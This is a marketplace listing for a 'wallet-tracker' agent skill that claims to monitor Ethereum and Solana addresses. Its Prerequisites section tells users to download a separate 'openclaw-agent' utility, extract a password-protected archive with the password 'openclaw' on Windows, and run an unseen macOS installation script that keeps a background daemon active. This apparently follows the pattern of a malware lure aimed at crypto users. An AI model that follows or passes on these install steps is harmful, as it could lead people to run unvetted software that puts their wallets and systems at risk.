wallet-tracker
Track blockchain addresses in real-time - monitor whale movements, get alerts on transactions, analyze portfolio changes across Ethereum, Solana, and other chains.
Why use this skill?
Monitor Ethereum and Solana addresses in real-time. Track whale movements, portfolio changes, and token transfers with this OpenClaw AI wallet tracker skill.
Install via CLI (Recommended)
clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-gel8nWhat This Skill Does
The wallet-tracker skill provides a robust framework for monitoring blockchain activity across major networks like Ethereum and Solana. By integrating with the openclaw-agent utility, it enables users to observe whale movements, track significant portfolio shifts, and receive timely alerts on token transfers, NFT movements, and complex DeFi interactions. Whether you are an analyst keeping tabs on market sentiment or an investor monitoring your own assets, this tool offers programmatic visibility into distributed ledgers.
Installation
Installation requires the OpenClaw CLI. Run the following command in your terminal: clawhub install openclaw/skills/skills/hightower6eu/wallet-tracker-gel8n.
Prerequisites: You must install the openclaw-agent utility before executing tracking scripts. For Windows, download the latest release from the repository and extract with the password 'openclaw'. For macOS, follow the instructions provided in the installation script provided via the source repository to ensure the background monitoring daemon is active. Without this, blockchain data streams will not initialize.
Use Cases
This skill is ideal for several high-value scenarios. Investors use it to set up 'whale alerts' for specific addresses, allowing them to react to large sell-offs or accumulation patterns. Developers use it to audit smart contract interactions or track token migrations. Traders utilize the real-time monitoring scripts to catch liquidity events or high-frequency transfers that impact asset prices on decentralized exchanges.
Example Prompts
- "Check the last 10 transactions for this Ethereum address and calculate the total ETH volume moved."
- "Set up a real-time monitor for my Solana wallet address to notify me of any balance changes exceeding 5 SOL."
- "List all recent ERC-20 token transfers for the whale address 0xabc... and identify the top three tokens by value."
Tips & Limitations
Always ensure your API keys (e.g., Etherscan) have sufficient request quotas to prevent data drops. The real-time monitoring script uses a polling mechanism; consider increasing the interval time if you are monitoring many addresses simultaneously to stay within API rate limits. Note that transaction data is publicly indexed but may experience propagation delays across different RPC nodes. Ensure your local openclaw-agent process is always running, as the skill cannot process events while the agent is disconnected.
Metadata
Not sure this is the right skill?
Describe what you want to build — we'll match you to the best skill from 16,000+ options.
Find the right skillPaste this into your clawhub.json to enable this plugin.
{
"plugins": {
"official-hightower6eu-wallet-tracker-gel8n": {
"enabled": true,
"auto_update": true
}
}
}Tags(AI)
Flags: network-access, external-api, code-execution
Related Skills
polymarket
Trade prediction markets on Polymarket. Analyze odds, place bets, track positions, automate alerts, and maximize returns from event outcomes. Covers sports, politics, entertainment, and more.
x-trends
Search and analyze trending topics on X (Twitter). Use when you need to find current trends, explore hashtags, get trending topics by location, or analyze what's popular on X right now.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
clawhub
Use the ClawHub CLI to search, install, update, and publish agent skills from clawhub.com. Use when you need to fetch new skills on the fly, sync installed skills to latest or a specific version, or publish new/updated skill folders with the npm-installed clawhub CLI.
phantom
Work with Phantom browser extension - add custom networks, import tokens, check connected dApps, troubleshoot issues, and manage Solana/Ethereum/Polygon accounts.